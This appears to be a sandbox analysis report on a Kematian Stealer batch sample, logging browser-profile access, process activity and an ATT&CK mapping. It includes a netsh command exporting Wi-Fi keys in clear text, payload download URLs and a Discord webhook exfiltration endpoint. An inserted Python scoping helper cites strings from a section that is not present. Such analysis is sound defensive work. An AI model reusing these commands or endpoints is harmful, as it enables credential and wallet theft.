Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\default
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\Browser Data\cookies_netscape_Chrome.txt
Source: Yara match | File source: 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR
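The wallet paths, the keyword alternation and the Kematian staging folder listed in this section are enough to scope what a victim lost. The following Python is an added example, not code from the sample or from the report: it applies those strings to a constructed file listing and reports which files the sample would have collected and which path is the sample's own output. Matching the alternation against the file name only, case-insensitively, is an assumption for this example (PowerShell's -match is case-insensitive by default, but the report does not show how the sample applies the pattern); the listing and the appdata default are constructed.

```python
"""Incident-scoping helper built from the strings in the section above: the
file-name keyword alternation the sample carries, the wallet paths it
resolves with Join-Path $env:appdata, and the Kematian staging folder seen in
the "File read" line. Given a listing of a user's files it reports which ones
the sample would have targeted. Added example, not code from the sample or
the report; the listing is constructed."""
import re
from pathlib import PureWindowsPath
from typing import Dict, List

# Alternation copied verbatim from the report. Note the stray space in "coinbase ":
# a name only matches that alternative when a space follows the word.
KEYWORDS = (
    "2fa|account|auth|backup|bank|binance|bitcoin|bitwarden|btc|casino|code|coinbase |crypto|"
    "dashlane|discord|eth|exodus|facebook|funds|info|keepass|keys|kraken|kucoin|lastpass|ledger|"
    "login|mail|memo|metamask|mnemonic|nordpass|note|pass|passphrase|paypal|pgp|private|pw|"
    "recovery|remote|roboform|secret|seedphrase|server|skrill|smtp|solana|syncthing|tether|"
    "token|trading|trezor|venmo|vault|wallet"
)
# PowerShell's -match is case-insensitive by default; that the sample uses -match and
# applies it to the file name rather than the whole path is an assumption.
KEYWORD_RE = re.compile(KEYWORDS, re.IGNORECASE)

# Wallet locations from the report, relative to %APPDATA% (Join-Path $env:appdata ...)
WALLET_DIRS = {
    "Electrum": r"Electrum\wallets",
    "com.liberty.jaxx": r"com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb",
    "Exodus": r"Exodus\exodus.wallet",
    "Ethereum": r"Ethereum\keystore",
}

# Staging folder from the report: %APPDATA%\Kematian\<cc>-(<host>)-(<yyyy-mm-dd>)-(<tz>)\...
STAGING_RE = re.compile(
    r"\\Kematian\\[^\\]+-\([^)]+\)-\(\d{4}-\d{2}-\d{2}\)-\([^)]+\)\\", re.IGNORECASE
)


def classify_path(path: str, appdata: str = r"C:\Users\user\AppData\Roaming") -> List[str]:
    """Return the reasons the sample would touch `path` (empty list if none)."""
    p = PureWindowsPath(path)
    reasons = []
    if STAGING_RE.search(path):
        reasons.append("staging-output")  # written by the stealer, not taken from the user
    for name, rel in WALLET_DIRS.items():
        wallet_dir = PureWindowsPath(appdata) / rel
        # PureWindowsPath compares case-insensitively, as NTFS would
        if p == wallet_dir or wallet_dir in p.parents:
            reasons.append(f"wallet:{name}")
    m = KEYWORD_RE.search(p.name)
    if m:
        reasons.append("keyword:" + m.group(0).strip().lower())
    return reasons


def scope(listing: List[str], appdata: str = r"C:\Users\user\AppData\Roaming") -> Dict[str, List[str]]:
    """Filter a file listing down to the entries the sample would have collected or created."""
    out = {}
    for path in listing:
        reasons = classify_path(path, appdata)
        if reasons:
            out[path] = reasons
    return out


# Constructed listing; the last entry is the staging path reported in the "File read" line.
SAMPLE_LISTING = [
    r"C:\Users\user\Documents\passwords.txt",
    r"C:\Users\user\Documents\Coinbase.pdf",  # no match: "coinbase " needs a trailing space
    r"C:\Users\user\Documents\Coinbase Statement.pdf",
    r"C:\Users\user\Desktop\holiday_photo.jpg",
    r"C:\Users\user\AppData\Roaming\Electrum\wallets\default_wallet",
    r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco",
    r"C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\Browser Data\cookies_netscape_Chrome.txt",
]

if __name__ == "__main__":
    for path, reasons in scope(SAMPLE_LISTING).items():
        print(f"{path}: {', '.join(reasons)}")
```

The alternation is kept exactly as it appears in the report, including the trailing space in "coinbase ", which is why Coinbase.pdf is not matched while "Coinbase Statement.pdf" is. Short entries such as code, info, note and pass also sweep up many unrelated files, which matters when estimating exposure from a host's directory listing.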
MITRE ATT&CK matrix (one line per tactic; the number in parentheses is the signature badge shown next to a technique in the matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Scripting (11); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation (831); Command and Scripting Interpreter (1); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Scripting (11); DLL Side-Loading (1); Registry Run Keys / Startup Folder (2); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: DLL Side-Loading (1); Process Injection (11); Registry Run Keys / Startup Folder (2); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Disable or Modify Tools (1); Obfuscated Files or Information (1); Software Packing (1); DLL Side-Loading (1); Masquerading (11); Virtualization/Sandbox Evasion (351); Process Injection (11); Rundll32 (1)
Credential Access: OS Credential Dumping (2); Credentials In Files (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: File and Directory Discovery (1); System Information Discovery (34); Security Software Discovery (851); Process Discovery (1); Virtualization/Sandbox Evasion (351); Application Window Discovery (1); System Network Configuration Discovery (1); System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Local System (31); Email Collection (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (13); Proxy (1); Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
Behavior Graph ID: 1467094 | Sample: thegreatestexecutor.bat | Start date: 03/07/2024 | Architecture: WINDOWS | Score: 100
Top-level DNS/IP info: raw.githubusercontent.com; ip-api.com; 3 other IPs or domains
Top-level signatures: Malicious sample detected (through community Yara rule); Yara detected PowerShell ScreenShot; Yara detected Powershell decode and execute; 12 other signatures

Process tree recovered from the behavior graph (counts in parentheses are the badges shown on the graph nodes):

• cmd.exe (7) started
  Created file: C:\Users\user\AppData\Roaming\...\fr.bat, Unicode (dropped)
  Signatures: Drops script or batch files to the startup folder; Bypasses PowerShell execution policy
  • powershell.exe (23) started
    Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); 10 other signatures
  • mshta.exe (1) started
    • powershell.exe (14, 75) started
      DNS/IP info: ip-api.com 208.95.112.1, 49717, 80 TUT-ASUS United States; raw.githubusercontent.com 185.199.109.133, 443, 49711, 49721 FASTLYUS Netherlands; www.cloudflare.com 104.16.123.96, 443, 49715, 49716 CLOUDFLARENETUS United States
      Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Loading BitLocker PowerShell Module; Uses netsh to dump wireless credentials
      • powershell.exe started
        DNS/IP info: objects.githubusercontent.com 185.199.110.133, 443, 49725 FASTLYUS Netherlands
        Signatures: Found Tor onion address; Tries to harvest and steal browser information (history, passwords, etc)
      • powershell.exe started
        DNS/IP info: github.com 140.82.121.3, 443, 49720, 49722 GITHUBUS United States
        Created file: C:\Users\user\AppData\...\bekownh2.cmdline, Unicode (dropped)
        • csc.exe started
          Created file: C:\Users\user\AppData\Local\...\bekownh2.dll, PE32 (dropped)
          • cvtres.exe started
      • conhost.exe started
      • 2 other processes
  • net.exe (1) started
    • net1.exe (1) started
  • 9 other processes
• svchost.exe started
  DNS/IP info: 127.0.0.1 unknown unknown

Source | Detection | Scanner | Label | Link
thegreatestexecutor.bat | 3% | ReversingLabs | |
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
http://ip-api.com/json | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
http://ip-api.com | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe |
https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps1 | 0% | Avira URL Cloud | safe |
https://www.cloudflare.com/cdn-cgi/trace | 0% | Avira URL Cloud | safe |
https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1 | 0% | Avira URL Cloud | safe |
https://aka.ms/winsvr-2022-pshelp | 0% | Avira URL Cloud | safe |
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps1 | 0% | Avira URL Cloud | safe |
https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/webcam.ps1 | 0% | Avira URL Cloud | safe |
https://github.com | 0% | Avira URL Cloud | safe |
http://crl.ver) | 0% | Avira URL Cloud | safe |
https://aka.ms/winsvr-2022-pshelpX | 0% | Avira URL Cloud | safe |
https://g.live.com/odclientsettings/ProdV21C: | 0% | Avira URL Cloud | safe |
http://www.microsoft. | 0% | Avira URL Cloud | safe |
https://raw.githubusercontent.com/C$&m | 0% | Avira URL Cloud | safe |
https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnw | 0% | Avira URL Cloud | safe |
https://raw.githubusercontent.com/ChildrenOfYa | 0% | Avira URL Cloud | safe |
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1 | 0% | Avira URL Cloud | safe |
https://www.cloudflare.com | 0% | Avira URL Cloud | safe |
https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin | 0% | Avira URL Cloud | safe |
http://go.micros | 0% | Avira URL Cloud | safe |
http://www.microscom/pkiops/certs/MicWinProPCA2011_2011-10-19.crt0 | 0% | Avira URL Cloud | safe |
http://github.com | 0% | Avira URL Cloud | safe |
https://github.com/TheWover | 0% | Avira URL Cloud | safe |
https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1 | 0% | Avira URL Cloud | safe |
https://g.live.com/odclientsettings/Prod1C: | 0% | Avira URL Cloud | safe |
https://raw.githubusercontent.com | 0% | Avira URL Cloud | safe |
https://raw.git | 0% | Avira URL Cloud | safe |
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1 | 0% | Avira URL Cloud | safe |
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1 | 0% | Avira URL Cloud | safe |
http://raw.githubusercontent.com | 0% | Avira URL Cloud | safe |
https://github.com/Somali-Devs/Kematian-Stealer | 0% | Avira URL Cloud | safe |
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/injection.js | 0% | Avira URL Cloud | safe |
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.cloudflare.com | 104.16.123.96 | true | false | | unknown
github.com | 140.82.121.3 | true | true | | unknown
raw.githubusercontent.com | 185.199.109.133 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown
objects.githubusercontent.com | 185.199.110.133 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1 | true | Avira URL Cloud: safe | unknown
https://www.cloudflare.com/cdn-cgi/trace | false | Avira URL Cloud: safe | unknown
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1 | false | Avira URL Cloud: safe | unknown
https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin | false | Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1 | false | Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1 | false | Avira URL Cloud: safe | unknown
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1 | true | | unknown
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 0000000C.00000002.1360562547.0000020A661C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3C1317000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1672707734.000002B3CFA90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000019.00000002.2548122352.00000236B24D9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps1 | powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps1 | powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000001F.00000002.1614835648.000002B3BFC51000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000000C.00000002.1337478042.0000020A56378000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000001F.00000002.1614835648.000002B3BFC51000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/webcam.ps1 | powershell.exe, 0000001F.00000002.1614710013.000002B3BE276000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com | powershell.exe, 0000001F.00000002.1614835648.000002B3C1028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3C0D64000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 0000000C.00000002.1337478042.0000020A569FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1337478042.0000020A57780000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1337478042.0000020A570A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3C0651000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com/json | powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
